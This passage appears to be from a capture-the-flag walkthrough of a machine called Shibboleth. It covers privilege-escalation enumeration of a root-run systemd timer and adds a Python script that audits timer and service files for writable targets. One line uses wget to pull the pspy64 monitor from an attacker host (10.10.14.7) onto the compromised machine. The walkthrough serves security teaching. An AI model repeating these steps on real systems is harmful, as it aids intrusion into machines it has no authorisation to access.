PSPY
A root cronjob process was discovered
zabbix@shibboleth:/dev/shm$ wget -q http://10.10.14.7/pspy64 ; chmod 755 ./pspy64
Delivery complete
zabbix@shibboleth:/dev/shm$ ./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
[pspy ASCII-art banner]
config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
Executing PSPY
While the root cronjob process didn't appear to execute any command, there is a root udev process executing something.
This was listed in the enumeration earlier as well:
mysqlcheck.timer
ipmi-svc@shibboleth:/dev/shm$ systemctl status mysqlcheck.timer
systemctl status mysqlcheck.timer
● mysqlcheck.timer - Start mysqlcheck service
Loaded: loaded (/etc/systemd/system/mysqlcheck.timer; enabled; vendor preset: enabled)
Active: active (waiting) since Mon 2023-04-17 18:26:28 BST; 3h 56min ago
Trigger: Mon 2023-04-17 22:23:20 BST; 2s left
Triggers: ● mysqlcheck.service
Warning: some journal files were not opened due to insufficient permissions.
The systemd timer and its service unit are located in the /etc/systemd/system/ directory
ipmi-svc@shibboleth:/dev/shm$ ll /etc/systemd/system/mysqlcheck*
4.0K -rw-r--r-- 1 root root 195 Oct 16 2021 /etc/systemd/system/mysqlcheck.timer
4.0K -rw-r--r-- 1 root root 230 Oct 15 2021 /etc/systemd/system/mysqlcheck.service
These are the service and timer files
ipmi-svc@shibboleth:/dev/shm$ cat /etc/systemd/system/mysqlcheck.service
# Restart mysql daemon if not responding
#
[Unit]
Description=Check MySQL daemon and restart it if necessary
Wants=mysqlcheck.timer
[Service]
Type=oneshot
ExecStart=/root/scripts/mysqlcheck
[Install]
WantedBy=multi-user.target
ipmi-svc@shibboleth:/dev/shm$ cat /etc/systemd/system/mysqlcheck.timer
cat /etc/systemd/system/mysqlcheck.timer
# mysqlcheck timer
#
[Unit]
Description=Start mysqlcheck service
Requires=mysqlcheck.service
[Timer]
Unit=mysqlcheck.service
OnUnitInactiveSec=5s
OnBootSec=5s
[Install]
WantedBy=timers.target
So the timer runs the service, which executes the script at /root/scripts/mysqlcheck every 5 seconds (OnUnitInactiveSec=5s re-arms the timer 5 seconds after the service last finished, and OnBootSec=5s fires it 5 seconds after boot).
Additionally, the script executes a command with the argument -e SELECT 1 (a simple health-check query against the MySQL daemon).
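The timer/service pair above can be audited mechanically. The following Python is an added example written for this page, not code from the write-up or from any tool it uses. It embeds constructed copies of the two unit files, parses them with a small INI-style parser (systemd keys may repeat, so every key maps to a list), converts the On*Sec= spans into seconds, pulls the executable out of each ExecStart= line, and flags whether that path, or its nearest existing parent directory, is group/world writable, which is the condition that turns a root-run timer into a privilege escalation risk. The function names and the SAMPLE_UNITS dictionary are this example's own.

```python
"""Added example, not part of the write-up: audit systemd timer/service pairs."""
import os
import re
import stat

# Constructed copies of the two unit files shown above, embedded so the example
# runs offline without reading /etc/systemd/system.
SAMPLE_UNITS = {
    "mysqlcheck.service": """\
[Unit]
Description=Check MySQL daemon and restart it if necessary
Wants=mysqlcheck.timer
[Service]
Type=oneshot
ExecStart=/root/scripts/mysqlcheck
[Install]
WantedBy=multi-user.target
""",
    "mysqlcheck.timer": """\
[Unit]
Description=Start mysqlcheck service
Requires=mysqlcheck.service
[Timer]
Unit=mysqlcheck.service
OnUnitInactiveSec=5s
OnBootSec=5s
[Install]
WantedBy=timers.target
""",
}

def parse_unit(text):
    """Parse a unit file into {section: {key: [values]}}; keys may repeat."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, value = line.split("=", 1)
        sections[current].setdefault(key.strip(), []).append(value.strip())
    return sections

# Longer unit names come first so 'min' is not read as 'm' plus stray text.
_SPAN = re.compile(r"(\d+)\s*(us|ms|min|m|sec|s|hr|h|d|w)?")
_SECONDS = {"": 1, "us": 1e-6, "ms": 1e-3, "min": 60, "m": 60, "sec": 1, "s": 1,
            "hr": 3600, "h": 3600, "d": 86400, "w": 604800}

def span_to_seconds(span):
    """Convert a systemd time span such as '5s', '1h 30min' or '2d' to seconds."""
    return float(sum(int(n) * _SECONDS[u] for n, u in _SPAN.findall(span)))

def describe_timer(timer_text):
    """Return (target unit, {On*Sec key: seconds}) from a .timer file."""
    timer = parse_unit(timer_text).get("Timer", {})
    target = timer.get("Unit", [None])[0]
    schedule = {k: span_to_seconds(v[0]) for k, v in timer.items()
                if k.startswith("On") and k.endswith("Sec")}
    return target, schedule

def exec_targets(service_text):
    """Return the executable path from every ExecStart= line of a .service file."""
    service = parse_unit(service_text).get("Service", {})
    # systemd allows prefixes such as '-', '+', '!', '@' or ':' before the path.
    return [cmd.split()[0].lstrip("-+!@:") for cmd in service.get("ExecStart", [])]

def writable_by_others(path):
    """True if the path, or its nearest existing ancestor, is group/world writable."""
    probe = path
    while not os.path.exists(probe) and os.path.dirname(probe) != probe:
        probe = os.path.dirname(probe)
    try:
        return bool(os.stat(probe).st_mode & (stat.S_IWGRP | stat.S_IWOTH))
    except OSError:
        return False

def audit(units):
    """Pair each .timer with the .service it triggers and summarise findings."""
    findings = []
    for name, text in units.items():
        if not name.endswith(".timer"):
            continue
        target, schedule = describe_timer(text)
        for path in exec_targets(units.get(target, "")):
            findings.append({"timer": name, "service": target, "exec": path,
                             "schedule": schedule,
                             "other_writable": writable_by_others(path)})
    return findings

if __name__ == "__main__":
    print(*audit(SAMPLE_UNITS), sep="\n")
```

Pointed at real files (read the contents of /etc/systemd/system/*.timer and their target services into the dictionary in place of SAMPLE_UNITS), this gives a defender a quick list of root-run timers, how often they fire, and which ExecStart targets live in paths other users can modify. For the sample here it reports /root/scripts/mysqlcheck re-armed 5 seconds after each run; the other_writable flag reflects the permissions of whatever part of that path exists on the host where the script runs.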